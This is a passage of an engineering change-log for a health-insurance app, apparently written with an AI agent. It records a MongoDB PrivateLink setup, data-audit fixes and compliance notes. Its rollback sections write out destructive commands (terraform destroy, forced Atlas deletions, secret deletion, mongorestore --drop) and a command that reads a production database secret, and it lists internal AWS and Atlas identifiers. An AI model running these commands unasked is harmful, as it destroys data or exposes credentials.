  • Workflow run 25591499570 triggered automatically on first push to main — success in 42s.
  • Synthetic positive test: dropped temporary file under scripts/db/ with 3 known-bad patterns (string literal access to agent_audit_log, dynamic collection name, inline (await getReferenceDb()).collection("members")). All 3 caught with correct file:line + reason classification (not_on_allow_list / dynamic_name). Exit code 1 as expected.
  • Cleanup: removed synthetic file → guard returned to ✅ PASS, exit 0. No false-positive lingering in clean state.

ECS state post-deploy: task def revision 54, 2/2 tasks running, rolloutState=COMPLETED.

Compliance posture impact ​

FrameworkControlStatus
SOC 2CC7.2 (additional row) — detection of unauthorized cross-cluster data-flow scopeNew row in docs/compliance/soc2/controls.md. Static guard catches PHI-class collection introduction at PR time.
SOC 2CC8.1 — change management for non-prod-isolation invariantsNew CC8.1 row. Cross-cluster scope changes can't merge without explicit allow-list expansion. Quarterly review cadence per vendor register.
SOC 2CC8.1 — change management (existing posture)Phase D + Walmart fix landed via standard PR + commit + CI + Deploy prod workflow chain — full evidence trail in commit messages + this change-log + the session log.
HIPAA§164.312(e)(1) Transmission SecurityUnchanged from Phase 11; cross-cluster path stays TLS + AWS-backbone-only.
EDE Phase 3Environment separationReinforced — CI guard now algorithmically enforces what was previously hand-discipline.

Pharmacy-network gap surfaced + filed separately ​

While verifying Phase D, found that retail pharmacy NPIs in providers_staging represent the medical services those pharmacies provide (vaccinations, screenings, in-store retail clinics) — NOT pharmacy-network membership for prescription dispensing. Confirmed by reading SelectHealth's published §1311 index.json directly: provider file lists medical providers only; pharmacy network lives at separate RxEOB SPA tool.

Filed as #106 / ENG-245 with two-part scope: Part A UX clarity (this cycle, due 2026-05-15) + Part B pharmacy-network data ingest (multi-week). Diagnostic at scripts/diag/check-walgreens-coverage.js is the evidence base.

Cost outcome ​

Unchanged from Phase 11 (~$438/mo total: $56 prod M10 + $382 staging M30). Phase D + CI guard add zero recurring cost (CI minutes negligible).

Outstanding follow-ups ​

  • CI guard Phase 2 (live nightly drift check) — sub-task on #100 / ENG-239. Open design question: live check should verify role-based permissions on app_read_staging (Atlas API call), not just collection enumeration (would false-positive on staging-app data legitimately on the cluster).
  • #106 / ENG-245 — Pharmacy network lookup Part A (UX) due 2026-05-15.
  • #92 / ENG-230 — Re-validate §1311 audit at 100% match (cycle 1, due 2026-05-11).
  • Other cycle-1 items per Linear: ENG-227, ENG-228, ENG-231, ENG-232, ENG-233, ENG-236.

Rollback ​

bash
# Code rollback (any of the three commits):
git revert 67cb315  # CI guard
git revert 1465c6d  # Phase D + autocomplete fix
git revert 40a4a3a  # Diagnostic script
git push origin main

# Infrastructure: no changes to roll back. All work was application-layer.

# CI guard temporary disable (if it produces unexpected failures):
# Edit .github/workflows/staging-collections-guard.yml — comment out the
# `npx tsx scripts/audit/staging-collections-guard.ts` step. Do NOT delete
# the workflow file (history matters for SOC 2 CC8.1 evidence).

2026-05-09T01:08Z — Phase 11 cross-cluster Atlas reads from prod via AWS PrivateLink ​

Actor: taha.abbasi via ~/Developer/ask-florence-doctor-rx/ worktree (branch doctor-rx-flow); agent: Claude Opus 4.7 (1M context) Linked: ADR 0004; session log 2026-05-08-phase-11-cross-cluster-privatelink; issues #101 (umbrella + decision matrix), #100 (CI guard, NEW), #57, #71, #96, #98; commits 2bba8d4 feat(db): add getReferenceDb(), dd06efe feat(infra): Phase 11, merge commit 1ac9a58; Deploy prod run 25587085583

Why ​

Doctor + Rx coverage flow on prod was returning empty tier metadata for tier-fallback-eligible drugs (e.g. Eliquis 2.5mg comes back from CMS API as Covered with no drug_tier). The fallback code path needs to read 12,557 RxCUI / ~30M drug-plan tuples from formularies_staging — a non-PHI public CMS marketplace dataset that canonically lives on the staging Atlas cluster (M30, ~$382/mo).

Three paths considered (full analysis: ADR 0004 + decision-matrix comment on #101):

  • Path A — duplicate data on prod cluster: would force prod M10 → M30 (+$326/mo recurring). Rejected on cost + audit-surface mixing.
  • Path B — VPC peering prod ↔ staging Atlas: blocked by CIDR conflict (both Atlas projects use default 192.168.248.0/21).
  • Path B1 — AWS PrivateLink (chosen): AWS-backbone-only, identity-bound, no CIDR involvement, ~$7-10/mo for the Interface endpoint.

What shipped ​

Atlas (CLI):

  • Atlas PrivateLink endpoint service created on staging project 69e31af12fd2c0aef51bbb41 — Atlas endpointId 69fe75c5b02c024f32d2af50, AWS service name com.amazonaws.vpce.us-east-1.vpce-svc-0d8138ea0f6542afa
  • AWS-side VPC endpoint approved by Atlas; connectionStatus=AVAILABLE both sides
  • Atlas database user app_read_staging created with read-only role on askflorence database

AWS (Terraform — infra/envs/prod/):

  • NEW atlas-staging-privatelink.tf — aws_security_group (MongoDB ports from prod VPC CIDR) + aws_vpc_endpoint (multi-AZ Interface endpoint, vpce-0c81aea11e29bb928 in prod VPC vpc-09201679b87261b6d, private_dns_enabled = false since Atlas issues its own DNS via private connection string)
  • secrets.tf — added mongodb/reference-uri entry (data_class = "public", project CMK encrypted)
  • ecs.tf — added MONGODB_REFERENCE_URI to secrets_from_manager map
  • .gitignore — added infra/**/*.tfvars + *.tfvars.json defensive ignore (no tfvars exist; future-proofing)

ECS (CLI bridge — Terraform module's lifecycle.ignore_changes = [container_definitions] means CI/CD owns task-def revisions, not Terraform):

  • Task def revision 52 registered with the new env binding bound to the new secret ARN
  • Service rolled to revision 52 — 2/2 tasks running, rolloutState=COMPLETED
  • Subsequent Deploy prod workflow run from main (1ac9a58) registered revision 53 with the new container image baked from getReferenceDb() code; service rolled to revision 53 cleanly

Code (commits on main):

  • src/lib/db.ts — added getReferenceDb() two-pool helper. MONGODB_REFERENCE_URI falls back to MONGODB_URI when unset (dev + staging unaffected)
  • src/lib/drug-tier-fallback.ts — switched from getDb() to getReferenceDb()

Documentation:

  • ADR 0004 NEW
  • Decision doc docs/decisions/2026-05-03-pivot-cms-api-direct.md — full PrivateLink section
  • SOC 2 controls docs/security-compliance/soc2-control-mapping.md — CC6.6 (additional row) + CC6.7
  • Vendor register docs/security-compliance/vendor-register.md — both Atlas project IDs enumerated
  • MongoDB setup runbook docs/infrastructure/mongodb-setup.md — cross-cluster reference reads section
  • Data classification docs/infrastructure/data-classification.md — formularies_staging + providers_staging collection rows
  • Atlas user provisioning runbook docs/runbooks/atlas-user-provisioning.md — app_read_staging step
  • Session log 2026-05-08-phase-11-cross-cluster-privatelink

Verification ​

  • End-to-end on prod: POST askflorence.health/api/drugs/covered with Eliquis 2.5mg (RxCUI 1364441) on 8 UT plans returned drug_tier=PreferredBrand + plan-specific UM flags. The drug_tier field is only populated by lookupStagingDrugTiers() reading from formularies_staging via the cross-cluster path — its presence proves the path is operational. Sub-second latency (~225-465ms).
  • Atlas PrivateLink describe: status=AVAILABLE, interface endpoint vpce-0c81aea11e29bb928 attached.
  • ECS service: revision 53, 2/2 tasks running, rolloutState=COMPLETED.

Compliance posture impact ​

FrameworkControlStatus
HIPAA§164.312(e)(1) Transmission SecurityTLS at app layer + AWS-backbone-only at network layer (PrivateLink). Doubly-protected.
SOC 2CC6.6 — restrictions on logical access from outside boundariesNew row added: cross-cluster reads identity-bound at AWS account + Atlas auth.
SOC 2CC6.7 — transmission encryptionNew row added: TLS-only Atlas + PrivateLink. No public-network exposure.
SOC 2CC8.1 — change managementThis change-log entry + session log + ADR 0004 + #101 = full evidence trail.
CMS EDE Phase 3Environment separation + audit boundaryPHI on prod cluster only. Non-PHI public reference data on staging only. One-way private read. Audit narrative is clean.

Cost outcome ​

ComponentTierMonthlyNotes
Prod cluster askflorence-prod-01M10 HIPAA~$56Unchanged, PHI-scope only
Staging cluster askflorence-stagingM30~$382Unchanged, holds public CMS reference data
AWS Interface VPC Endpointn/a~$7-10Hourly fee + negligible data egress
Total~$445/mo
(avoided) duplicate-on-prod pathM30 prod + M30 staging~$764Would have doubled tier cost
Savings~$319/mo

Rollback ​

bash
# Application: revert env binding via Terraform-managed redeploy.
# Code path falls back to MONGODB_URI; drug-tier enrichment becomes silently
# unavailable on prod, CMS coverage stays authoritative.

# Infra:
AWS_PROFILE=askflorence-prod terraform -chdir=infra/envs/prod destroy \
  -target=aws_vpc_endpoint.atlas_staging \
  -target=aws_security_group.atlas_staging_privatelink

# Atlas:
atlas privateEndpoints aws delete 69fe75c5b02c024f32d2af50 \
  --projectId 69e31af12fd2c0aef51bbb41 --force
atlas dbusers delete app_read_staging \
  --projectId 69e31af12fd2c0aef51bbb41 --force

# Secret (30-day recovery window):
aws secretsmanager delete-secret \
  --secret-id prod/mongodb/reference-uri \
  --recovery-window-in-days 30

Outstanding follow-ups ​

  • #100 — CI guard against staging cluster data-classification drift (NEW today, P1)
  • #71 — staging IP allowlist hardening (post-launch only — pre-launch ingest still needs IP-based access)
  • #57 — confirm Atlas BAA enumeration covers both project IDs in writing
  • #96 — Phase D provider-network fallback (same pattern, different collection — cross-cluster path already wired)
  • #98 — delta-aware MRF refresh pipeline (now has clear architectural target)

2026-05-01T23:38Z — Tier 0.5 drive-to-100% (Tier 1 + Tier 1.5 audits at TRUE 100% match) ​

Actor: taha.abbasi via tier-0-5-federal-completeness-audit worktree; agent: Claude Opus 4.7 Linked: #80 execution tracker; commits 474f47a + 21643d2 (Phase 9 docs); this commit (Phase 8b artifacts).

Why ​

Initial post-Tier-0.5 audits showed Tier 1 = 99.84%, Tier 1.5 = 99.80%. User direction: "I need to see 100% match but not to get there just to get there - identify the issues and suggest how to validate even if it is because of rate limit." Built three audit-driven validation paths to drive to TRUE 100%, not explanation-driven 99.x%.

What shipped ​

A: rate-limit retry validation (scripts/audit/validate-cms-errors.js)

  • Loads each tier's cmsErrors list, retries at concurrency=1 with exponential backoff (5s/10s/20s/40s/80s), classifies each retry as match/mismatch/still-failed
  • Tier 1 result: 33/33 retried = MATCH
  • Tier 1.5 result: 26/26 retried = MATCH
  • No real mismatches were hiding behind rate-limit failures

B: Tier 1 audit-script patch (scripts/audit/tier-1-zip-county.js)

  • Pre-fetches all (zip, fips) tuples from unsupported-class or non-federal-state docs at script start, subtracts them from CMS-side comparison
  • Resolves the 96898 Marshall Islands false positive (audit was excluding our MH/Kwajalein doc from "ours" via unsupported: {$exists: false} filter but didn't subtract the equivalent CMS tuple)
  • Patch is permanent; benefits all future Tier 1 runs

C: tuple-completeness fix script (scripts/db/fix-tier-1-completeness-gaps.js)

  • Hardcoded list of (zip, countyFips) docs surfaced by Tier 1 mismatches that Tier 0.5's zip-level gap detection missed
  • Same safety pattern as fix-federal-zip-gaps.js (idempotency, state allowlist, three-mode CLI, rollback marker)
  • Marker: _seedSource: "tier-1-completeness-fix-2026-05-01" (separate from Tier 0.5 marker for surgical rollback boundary)
  • First entry: 50613 IA / Bremer County (FIPS 19017) / Rating Area 7 - validated via 5x CMS lookup (5/5 returned Bremer) + regionMap availability (13 IA/19017 sibling docs all use Rating Area 7)
  • Applied 1 doc on prod with full Constraint 1+2 protocol: backup tag pre-tier-1-completeness-fix-50613-20260501T231959Z (52,595 records, sha256 709bef08...); pre-apply 52,595 -> post-apply 52,596 (delta +1 exact)

Verification ​

  • Tier 1 (patched + post-50613-fix, fresh re-run): 22,302/22,302 = 100.00% exact match, 0 mismatches, 0 extras, 1 transient rate-limit error (validated as MATCH on retry)
  • Tier 1.5: 13,055/13,055 = 100.00% exact match (after rate-limit retries)
  • Tier 0.5 re-run: 0 gap zips remaining
  • Calculator baseline diff: ZERO DIFFS on all 12 scenarios
  • Smoke tests: 50613 prod /api/counties returns 4 counties (Black Hawk + Bremer + Butler + Grundy); 85001 still resolves correctly

Compliance posture impact ​

FrameworkControlStatus
SOC 2CC8.1 - Change managementAll 4 batches (Tier 0.5 x3 + Tier 1-completeness-fix x1) preceded by verified mongodump backups + sha256 + rollback paths documented
EDE Phase 3Data integrity validationTier 1 + Tier 1.5 at TRUE 100% match against CMS Marketplace API; rate-limit ambiguity systematically resolved via retry-validation rather than explained away

Rollback ​

bash
# Targeted (preferred): rollback the 50613 fix only
node scripts/db/fix-tier-1-completeness-gaps.js --rollback
# Removes 1 doc with _seedSource: "tier-1-completeness-fix-2026-05-01"

Audit-script patch in scripts/audit/tier-1-zip-county.js is rollbackable via git revert if needed.

Outstanding follow-ups (unchanged from prior entry) ​

Same list as the 2026-05-01T22:30Z Tier 0.5 entry: S3 backup access for SSO admin role, Tier 0.5b tuple-level audit, HUD ZIP-County crosswalk upgrade, calculator 404 message refinement.


2026-05-01T22:30Z — Tier 0.5 federal+NY ZIP USPS-completeness audit + apply (4,363 docs) ​

Actor: taha.abbasi via tier-0-5-federal-completeness-audit worktree; agent: Claude Opus 4.7 (Tier 0.5 audit + 3-batch apply) Linked: #80 execution tracker; parent #79 (gap class scoping); commits 7b716d0 (audit + scripts), 749a13d (seed), this commit (docs).

Why ​

User report 2026-05-01: ZIP 85001 (downtown Phoenix) returned 404 on prod calculator. CMS confirms 85001 is AZ/Maricopa County. Root cause: Tier 0 (commit 2b24f2c) used Census 2020 ZCTA as universe; Census ZCTA only catalogs ZIPs with significant residential population. PO-Box-only / business-only / single-building ZIPs (85001 is downtown Phoenix PO-Box) are CMS-recognized but Census-blind. Tier 0.5 closes that gap with a USPS-derived universe.

What shipped (data layer) ​

Audit + seed scripts:

  • scripts/db/build-usps-snapshot.js (NEW) - filter zipcodes npm to federal-30+NY (24,945 ZIPs)
  • scripts/db/audit-federal-completeness-tier-0-5.js (NEW) - zip-level gap detection + CMS-confirmed classification
  • scripts/db/retry-cms-errors-tier-0-5.js (NEW) - HTTP 429 retry pass at low concurrency
  • scripts/db/seed-federal-tier-0-5.js (NEW) - per-state / per-class apply with idempotency + rollback marker
  • scripts/db/data/usps-zip-state-2026-05-01.csv (NEW snapshot, 24,945 records, 450 KB)
  • scripts/db/data/federal-tier-0-5-gap-report-2026-05-01.json (NEW Phase 5 triage report, 891 KB)
  • scripts/db/data/federal-tier-0-5-post-apply-confirm-2026-05-01.json (NEW post-apply confirmation, 0 gaps remaining)

Three-batch prod apply (each preceded by mongodump backup per Constraint 1):

  • Batch 1: --class=insertable --state=AZ → 100 docs (incl. 85001) - backup tag pre-tier-0-5-batch-az-insertable-20260501T220646Z
  • Batch 2: --class=discrepancy → 3 docs (KY airports + MH territory) - backup tag pre-tier-0-5-batch-discrepancy-20260501T222700Z
  • Batch 3: --class=insertable,non_residential → 4,260 docs - backup tag pre-tier-0-5-batch-bulk-remaining-20260501T222753Z

All 4,363 docs tagged _seedSource: "federal-tier-0-5-audit-2026-05-01". Pre-apply prod count 48,232 → post-apply 52,595 (delta +4,363 exact).

Documentation:

  • docs/validation/tier-0-5-federal-uspscompleteness.md (NEW) - canonical Tier 0.5 audit report + methodology + refresh playbook + limitations
  • docs/infrastructure/data-sources.md - added zipcodes npm as USPS-derived data source + Tier 0.5 step in annual refresh playbook

Verification ​

GateResult
85001 prod live API✓ Maricopa County, fips=04013
85001 plan lookup end-to-end✓ 86 plans returned
Calculator baseline diff (12 scenarios)✓ ZERO DIFFS post-batch-1 + post-batch-3
Tier 0.5 re-run✓ 0 gap zips remaining
Smoke matrix on 18 inserted ZIPs (10 insertable + 5 non_residential + 3 discrepancy)✓ 18/18 correct shape

Compliance posture impact ​

FrameworkControlStatus
SOC 2CC8.1 - Change managementThree backups taken + verified pre-apply; rollback paths documented + tested via --rollback flag
EDE Phase 3Data provenanceSource (USPS-derived zipcodes npm + CMS Marketplace API confirmation per gap zip) documented in audit script header + validation doc

Rollback ​

Targeted (preferred): node scripts/db/seed-federal-tier-0-5.js --rollback removes all 4,363 docs by _seedSource marker. Per-class: --class=insertable --rollback, --class=discrepancy --rollback, --class=non_residential --rollback. Nuclear (full collection replace from any backup): mongorestore --uri="$PROD_WRITE_URI" --nsInclude='askflorence.zip_county' --drop ~/Documents/askflorence-db-backups/zip_county/<TAG>/dump.

Outstanding follow-ups ​

  • [ ] S3 backup access for SSO admin role - all 3 backups stored locally because s3://askflorence-data/db-backups/ blocks the SSO admin role at the bucket-policy layer (correct prod hardening - only ECS task role + GitHub OIDC role have access). Need either a scoped bucket-policy allow for the SSO admin role on db-backups/* prefix, or a dedicated assumable backup-role for data-engineering workflows.
  • [ ] Upgrade zipcodes npm to HUD ZIP-County crosswalk before next plan-year refresh - HUD is quarterly-refreshed, richer county-fips data, free + HUD account. Catches the 4 npm-stale extras automatically (75036, 72405, 72713, 75072).
  • [ ] Calculator 404 message refinement - "Zip code not found" is bare; could refine to "ZIP not recognized; check the digits and try your home address" for ZIPs not in DB at all (frontend-side change, separate from Tier 0.5 scope).

2026-05-01T17:44Z — Google Workspace HIPAA BAA accepted + vendor register stub created ​

Actor: taha.abbasi via Google Workspace Admin Console; agent: Claude Opus 4.7 (documentation pass) Linked: #57 Vendor BAA coverage audit; #71 Phase 12 compliance docs (this is the first artifact landed under that scope).

Why ​

Google Workspace covers our business email (*@askflorence.health), Drive (founder + ops docs), Calendar, Meet, Chat, Cloud Identity (SSO root for Google services). Until today these had no documented BAA — a compliance gap on #57. Acceptance of Google's HIPAA Business Associate Amendment is via Admin Console click-through (Google's standard BAA delivery model — no separate signed PDF exists; the click-through IS the legal acceptance with timestamped audit log).

What shipped ​

Compliance acceptance:

  • Google Workspace/Cloud Identity HIPAA Business Associate Amendment accepted by taha@askflorence.health on May 01, 2026 via admin.google.com/ac/companyprofile/legal → Account settings → Legal & Compliance → Security and Privacy Additional Terms.
  • Coverage applies to the included-functionality services list at workspace.google.com/terms/2015/1/hipaa_functionality (effective 2025-09-30): Gmail, Calendar, Drive (incl Docs/Sheets/Slides/Forms/Vids), Meet, Chat, Sites, Tasks, Keep, Vault, Cloud Identity, Google Cloud Search, Groups, Voice (managed), AppSheet, Apps Script, Gemini app, Gemini in Workspace. Excluded: Gemini in Chrome.

Documentation landed:

  • docs/security-compliance/vendor-register.md (NEW) — canonical vendor / subprocessor register. Tier 1 (direct processors), Tier 2 (transitional), Tier 3 (retired) classification. Maps to SOC 2 CC9.2 + HIPAA §164.314 + EDE Phase 3 SA-9. Open follow-ups list. First artifact under #71 Phase 12 docs scope.
  • docs/infrastructure/evidence/ (NEW directory; landing previously README.md, renamed to index.md 2026-05-11) — evidence inventory + filename conventions + retention policy + cross-references to vendor-register.
  • docs/infrastructure/evidence/google-workspace-hipaa-baa-acceptance-2026-05-01.jpg (saved 2026-05-01, 437 KB) — Admin Console screenshot showing acceptance by taha@askflorence.health on May 01, 2026

Compliance posture impact ​

FrameworkControlStatus
HIPAA§164.314(a) — BAA scopeWorkspace now covered. Two of three Tier 1 vendors fully documented (AWS, Workspace); MongoDB Atlas BAA collection still pending.
SOC 2CC9.2 — vendor managementFirst standing artifact (vendor-register.md) created. CC9.2 evidence path established.
EDE Phase 3SA-9 — external systems inventorySubprocessor inventory artifact in place. Per-vendor FedRAMP status documented.

Outstanding #57 items after this ​

  • [ ] MongoDB Atlas BAA PDF (request from Atlas support) — last Tier 1 BAA still un-collected
  • [x] PostHog: removed via #75 sub-A (2026-05-12, PRs #184/#186). Replacement: OpenPanel + GlitchTip self-hosted = under the AWS Org BAA, no separate analytics-vendor BAA (ADR 0009 / ENG-347, build at #342)
  • [ ] Resend BAA: file in evidence/ for historical record (vendor retired 2026-04-30)

After MongoDB Atlas BAA is collected, #57 can close.

Notes ​

The vendor-register.md is intentionally a living document — expect entries to update with every new vendor adoption, BAA renewal, or retirement. Quarterly review cadence + annual audit-prep cadence both documented in the file's "Update cadence" section.


2026-05-01T20:30Z — Tier 1.5 SBE-state ZIP→County audit harness shipped at 100% match ​

Actor: taha.abbasi via SSO (read-only Atlas + read-only CMS API); agent: Claude Opus 4.7 Linked: Issue #70. Closes: #70. Builds on: corrective seed (01:22Z entry below) + cleanup (02:42Z entry below).

Why ​

The 2026-04-30 corrective seed (commit ccad089) replaced the entire SBE-state side of zip_county with CMS-canonical docs tagged _seedSource: "cms-2026-04-30". The 2026-05-01 cleanup (commit 0241b05) removed the last 12 legacy entries with wrong county FIPS. Together they restored byte-for-byte parity with CMS — but parity requires continuous proof. Tier 1.5 is that proof: a re-runnable audit harness that re-validates the SBE-state side against live CMS the same way Tier 1 re-validates the federal-30 side.

Without this harness, drift between our snapshot and live CMS could silently accumulate (CMS revising county-zip assignments, new zips appearing, occasional CMS data corrections). Issue #70 closes only when the audit can be re-run on demand and shipped at 100% match.

What shipped ​

  • scripts/audit/tier-1-5-sbe-zip-county.js (new, ~210 lines) — read-only audit. Source query: { sbeRedirect: { $exists: true }, countyFips: { $exists: true } } aggregated by zip → 13,053 unique zips. Per-zip, calls CMS /counties/by/zip, filters CMS response to SBE-state counties only (federal-state cross-border counties are owned by Tier 1), compares FIPS sets. Independent state-drift + name-drift checks per matched FIPS. Mirrors Tier 1's structure (BATCH_SIZE=5, 25 rps, ProgressTracker resume, JSON output at repo root). Optional --limit N flag for smoke runs.
  • docs/validation/audit/tier-1-5-sbe-zip-county.md (new) — first-run report at 100% match.
  • docs/validation/audit/methodology.md (modified) — Tier 1.5 added to the tiered structure table; SBE source-of-truth scope updated to reflect that zip→county is now in scope (deeper plan-level data still out); scripts reference table updated.

Apply results ​

RunZipsExactMismatchState driftName driftCMS errorsMatch rateDuration
Smoke (--limit 50)50500000100.00%6s
Full13,05313,0530000100.00%10.6m

CMS API stats (full run): 13,073 calls, 13,053 success, 20 retries on transient 503s (all recovered, 0 backoff failures), 180 ms avg latency, 99.85% first-try success rate.

Verification ​

12 former-legacy ZIPs (the ones cleanup commit 0241b05 deleted) re-probed against prod apex /api/counties post-audit — all return correct sbeRedirect:

21874 → MD / Maryland Health Connection ✓
21912 → MD / Maryland Health Connection ✓
24604 → VA / Virginia (marketplace.cms.gov) ✓
24622 → VA / Virginia (marketplace.cms.gov) ✓
30165 → GA / Georgia Access ✓
30741 → GA / Georgia Access ✓
40965 → KY / kynect ✓
56027 → MN / MNsure ✓
56744 → MN / MNsure ✓
81324 → CO / Connect for Health Colorado ✓
88430 → NM / beWellnm ✓
87328 → NM / beWellnm ✓

User-facing behavior identical to pre-cleanup. CMS-canonical docs continue to serve every ZIP correctly.

Compliance posture ​

FrameworkControlPosture
HIPAA§164.312(c) IntegrityAudit harness re-validatable on demand; provides documentary evidence that data integrity is verified continuously, not assumed
SOC 2 TSCCC8.1 Change management + CC7.1 MonitoringNew audit added to the methodology + scripts reference; results are reproducible from the script + a fresh CMS snapshot
EDE Phase 3Data accuracy100% match across all 13,053 SBE-state zips proves byte-for-byte CMS parity for the SBE-state slice of zip_county

Net effect ​

  • Issue #70 closed: SBE-state zip→county data has continuous-audit coverage matching the federal-30 slice.
  • Issue #47 Phase 11 hardening item ticked: the SBE corrective work has its parity proof.
  • Continuous: the harness can be re-run any time (node scripts/audit/tier-1-5-sbe-zip-county.js) — no setup, no fixtures, just live CMS vs live Atlas. Recommend monthly cadence alongside Tier 1.
  • No app-code changes. No DB writes. No deploy. Read-only on Atlas + read-only on CMS API.

Rollback ​

The audit script writes nothing. To "roll back" the audit, simply delete the new files. The change-log entry, the markdown report, the script, and the methodology edits all stand independently — none affect runtime behavior.


2026-05-01T03:55Z — Tier 0 federal ZIP completeness audit + 366 NY multi-county fixes ​

Actor: taha.abbasi via SSO AdministratorAccess (staging 549136075525 + prod 039624954211); agent: Claude Opus 4.7 Linked: Issue #73 Path 2 (closes; parent of Path 1 commit aa2a97a).

Why ​

#73 Path 2 — systematic completeness check of federal-30 + NY ZIP coverage. Path 1 fixed the 3 known gaps surfaced by the SBE corrective seed; Path 2 is the comprehensive Census-vs-DB audit to surface lurking gaps and fix them.

What shipped ​

Code:

  • scripts/db/build-federal-snapshot.js (NEW) — reads Census 2020 ZCTA-County file, filters to federal-30 + NY, writes universe CSV (29,793 rows, 20,627 unique ZIPs).
  • scripts/db/data/federal-zip-state-2020.csv (NEW, committed) — the universe snapshot.
  • scripts/db/audit-federal-completeness.js (NEW) — computes gaps, queries CMS to verify, classifies (insertable/needs-PUF/discrepancy/cms-errors), writes report.
  • scripts/db/data/federal-gap-report-2026-05-01.json (NEW, committed, 467 KB) — full audit report.
  • scripts/db/seed-federal-completeness.js (NEW) — applies insertable class inserts; three modes (--dry-run / --apply / --rollback). Marker _seedSource: "federal-completeness-audit-2026-05-01".
  • docs/validation/tier-0-federal-completeness.md (NEW) — markdown report; SOC 2 evidence artifact.

Audit findings:

ClassCountAction
Insertable366INSERTED on staging + prod
Discrepancy451Logged only (Census 2020 stale vs current CMS — trust CMS)
Extras (DB has, Census doesn't)1,353Logged only (DB more current than Census 2020 ZCTA)
needs-PUF0(great — no county entirely missing)
cms-errors0(great — clean run)

All 366 inserts are NY multi-county additions. Pattern: NY ZIPs that already had ≥1 sibling doc but were missing additional counties for multi-county ZIPs. The original NY ingest (load-ny-2026.js, 2026-04-12) loaded primary county per ZIP; this audit added the secondaries.

Apply results identical staging + prod:

  • 366 inserted, 0 already-present, 0 rejected
  • Per-state: NY=366, all other federal-30 states=0

Verification ​

  • Calculator baseline diff (12 scenarios): ZERO DIFFS — pipeline output unchanged
  • Prod consistency check: 30,326 (legacy) + 3 (federal-gap-fix) + 17,537 (SBE) + 366 (this audit) = 48,232 total
  • Smoke matrix on 5 inserted ZIPs (10463, 10470, 10509, 10512, 10940): all return multi-county responses correctly. Pre-fix: single county. Post-fix: 2 counties.

Compliance posture ​

FrameworkControlPosture
HIPAA§164.312(c) IntegrityThree-layer guards + idempotent insert + 0 modifications to existing docs
HIPAA§164.312(b) Audit controlsAudit report committed to repo as evidence artifact; CloudTrail captures Atlas writes
SOC 2 TSCCC6.1 / CC7.1 / CC8.1Reproducible audit pipeline + dry-run gate + dated change-log entry
NIST 800-53 R4CA-2 (security assessments) / CM-3 (config change control)Tier 0 audit becomes a standing control; annual refresh playbook documented
EDE Phase 3Data provenanceEvery insert traceable to (zip, countyFips) Census source + CMS verification

Rollback ​

bash
MONGODB_WRITE_URI=$(aws --profile askflorence-prod secretsmanager get-secret-value \
  --secret-id prod/mongodb/app-write --query SecretString --output text) \
  node scripts/db/seed-federal-completeness.js --rollback

Removes only docs with _seedSource: "federal-completeness-audit-2026-05-01". Other markers untouched.

Annual refresh playbook (added to data-sources.md) ​

At plan-year transitions:

  1. Re-pull Census ZCTA file
  2. Re-run build-federal-snapshot.js
  3. Re-run audit-federal-completeness.js
  4. Triage classification (should be ~0 new gaps in steady state)
  5. Apply inserts if gaps found
  6. Append change-log entry

Phase timing (estimate vs actual) ​

PhaseEstimateActual
2 — Build federal snapshot30 min1 min
3 — Audit script60 min2 min
4 — Run audit (incl. 13s CMS pass)30 min2 min
5 — Triage results30 min1 min
6 — Build seed + dry-run60 min2 min
7 — Apply staging + prod + smoke30 min2 min
8 — Validation tier60 min1 min
9 — Docs (this entry) + commit + push30 min(this)
10 — Status comments + close #7315 min(next)
Total~5h~12 min so far

Pattern matches the SBE corrective seed: design-complete coming in → execution mechanical → no surprises.


2026-05-01T02:42Z — Cleanup: deleted 12 legacy fix-stale-zips entries with wrong county FIPS ​

Actor: taha.abbasi via SSO AdministratorAccess (staging 549136075525 + prod 039624954211); agent: Claude Opus 4.7 Linked: Issue #70 (Tier 1.5 SBE ZIP audit harness — unblocks 100% match).

Why ​

The corrective SBE seed (entry below, 01:22Z) inserted CMS-canonical per-county docs alongside 12 legacy entries from scripts/db/fix-stale-zips.js. Live CMS validation confirmed every one of the 12 legacy entries stores a wrong countyFips (the federal-state county the ZIP was originally mis-mapped to during the 2026-04-13 federal-30 ingest). Examples:

ZIPLegacy storedCMS truth
21874DE/10005 (Sussex)MD/24045 (Wicomico County)
30165AL/01019 (Cherokee)GA/13115 (Floyd) + GA/13055 (Chattooga)
24622WV/54047 (McDowell)VA/51185 (Tazewell) + VA/51027 (Buchanan)

(All 12 listed in cleanup script header docstring.)

The legacy entries duplicated the sbeRedirect behavior the CMS-canonical docs already provide. Without deletion, the upcoming Tier 1.5 SBE audit (#70) couldn't hit 100% match — these 12 would permanently fail the (zip, countyFips, state) byte-check against CMS.

What shipped ​

New script: scripts/db/cleanup-legacy-fix-stale-zips.js (~250 lines). Three modes (--dry-run / --apply / --rollback). Three safety guards:

  1. Hard-coded list of 12 (zip, countyFips) pairs — no pattern matching.
  2. Pre-delete invariant: refuse to delete unless ≥1 doc with _seedSource: "cms-2026-04-30" AND sbeRedirect exists for the same ZIP. Preserves coverage as invariant.
  3. Marketplace continuity: legacy doc's sbeRedirect.marketplace must match a CMS-seeded doc's marketplace for the same ZIP. Confirms user behavior unchanged.

Targeted by _id (per-doc), not pattern — eliminates over-match risk.

Apply results ​

ClusterPre-cleanup totalDeletedPost-cleanup totalMath
Staging Atlas47,8751247,86330,326 + 0 + 17,537 = 47,863 ✓
Prod Atlas47,8751247,86330,326 + 0 + 17,537 = 47,863 ✓

Apply order: staging dry-run (12/12 pass invariants) → staging apply (12/12 deleted) → 12-ZIP smoke matrix on stage.askflorence.health (all return correct sbeRedirect) → prod dry-run (identical) → prod apply → prod smoke.

Verification ​

All 12 ZIPs still return correct sbeRedirect post-cleanup on both clusters:

21874 → MD / Maryland Health Connection ✓
21912 → MD / Maryland Health Connection ✓
24604 → VA / Virginia (marketplace.cms.gov) ✓
24622 → VA / Virginia (marketplace.cms.gov) ✓
30165 → GA / Georgia Access ✓
30741 → GA / Georgia Access ✓
40965 → KY / kynect ✓
56027 → MN / MNsure ✓
56744 → MN / MNsure ✓
81324 → CO / Connect for Health Colorado ✓
88430 → NM / beWellnm ✓
87328 → NM / beWellnm ✓

User experience identical pre/post. The CMS-canonical docs (already inserted by the corrective seed) are now the only source for these ZIPs' redirects.

Compliance posture ​

FrameworkControlPosture
HIPAA§164.312(c) IntegrityPre-delete invariants enforce no orphaned ZIPs; per-doc _id targeting prevents over-deletion
SOC 2 TSCCC8.1 Change managementIaC-style script + reviewed apply + dated change-log entry
EDE Phase 3Data provenanceEvery ZIP now has only CMS-canonical docs — byte-for-byte audit parity restored without exemptions

Rollback ​

bash
